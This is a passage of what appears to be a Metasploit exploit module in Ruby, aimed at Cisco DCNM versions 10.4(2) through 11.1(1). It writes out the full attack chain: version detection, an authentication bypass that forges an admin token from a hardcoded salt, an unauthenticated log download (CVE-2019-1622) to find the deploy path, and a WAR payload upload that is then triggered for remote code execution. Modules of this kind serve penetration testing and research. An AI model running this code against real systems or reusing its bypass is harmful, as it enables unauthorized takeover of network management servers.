OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']),
])
end
def check
# at the moment this is the best way to detect
# check if pmreport and fileUpload servlets return a 500 error with no params
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'),
'vars_get' =>
{
'token' => rand_text_alpha(5..20)
},
'method' => 'GET'
)
if res && res.code == 500
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
'method' => 'GET',
)
if res && res.code == 500
return CheckCode::Detected
end
end
CheckCode::Unknown
end
def target_select
if target != targets[0]
return target
else
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
'method' => 'GET'
)
if res && res.code == 200
if res.body.include?('version":"11.1(1)')
print_good("#{peer} - Detected DCNM 11.1(1)")
print_status("#{peer} - No authentication required, ready to exploit!")
return targets[1]
elsif res.body.include?('version":"11.0(1)')
print_good("#{peer} - Detected DCNM 11.0(1)")
print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
return targets[2]
elsif res.body.include?('version":"10.4(2)')
print_good("#{peer} - Detected DCNM 10.4(2)")
print_status("#{peer} - No authentication required, ready to exploit!")
return targets[3]
else
print_error("#{peer} - Failed to detect target version.")
print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
print_error(res.body)
print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
return targets[3]
end
end
fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
end
end
def auth_v11
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET',
'vars_get' =>
{
'userName' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
},
)
if res && res.code == 200
# get the JSESSIONID cookie
if res.get_cookies
res.get_cookies.split(';').each do |cok|
if cok.include?("JSESSIONID")
return cok
end
end
end
end
end
def auth_v10
# step 1: get a JSESSIONID cookie and the server Date header
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET'
)
# step 2: convert the Date header and create the auth hash
if res && res.headers['Date']
jsession = res.get_cookies.split(';')[0]
date = Time.httpdate(res.headers['Date'])
server_date = date.strftime("%s").to_i * 1000
print_good("#{peer} - Got sysTime value #{server_date.to_s}")
# auth hash format:
# username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
session_id = rand(1000..50000).to_s
md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
"POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
md5_str = Base64.strict_encode64(md5)
# step 3: authenticate our cookie as admin
# token format: sessionId.sysTime.md5_str.username
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'),
'cookie' => jsession,
'vars_get' =>
{
'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
},
'method' => 'GET'
)
if res && res.code == 500
return jsession
end
end
end
# use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
def get_war_path
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
'method' => 'GET'
)
if res && res.code == 200
tmp = Tempfile.new
# we have to drop this into a file first
# else we will get a Zip::GPFBit3Error if we use an InputStream
File.binwrite(tmp, res.body)
Zip::File.open(tmp) do |zis|
zis.each do |entry|
if entry.name =~ /jboss[0-9]*\.log/
fdata = zis.read(entry)
if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
tmp.close
tmp.unlink
return $1.strip
end
end
end
end
end
end
def exploit
target = target_select
if target == targets[2]
jsession = auth_v11
elsif target == targets[3]
jsession = auth_v10
end
# targets[1] DCNM 11.1(1) doesn't need auth!
if jsession.nil? && target != targets[1]
fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
elsif target != targets[1]
print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
end
war_path = get_war_path
if war_path.nil? or war_path.empty?
fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
else
print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
end
# Generate our payload... and upload it
app_base = rand_text_alphanumeric(6..16)
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
fname = app_base + '.war'
post_data = Rex::MIME::Message.new
post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
post_data.add_part(war_payload,
"application/octet-stream", 'binary',
"form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
data = post_data.to_s
print_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
'method' => 'POST',
'data' => data,
'cookie' => jsession,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
)
if res && res.code == 200 && res.body[/#{fname}/]
print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")
sleep 10
print_status("#{peer} - Executing payload...")
send_request_cgi(
'uri' => normalize_uri(target_uri.path, app_base),
'method' => 'GET'
)
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
end
end
end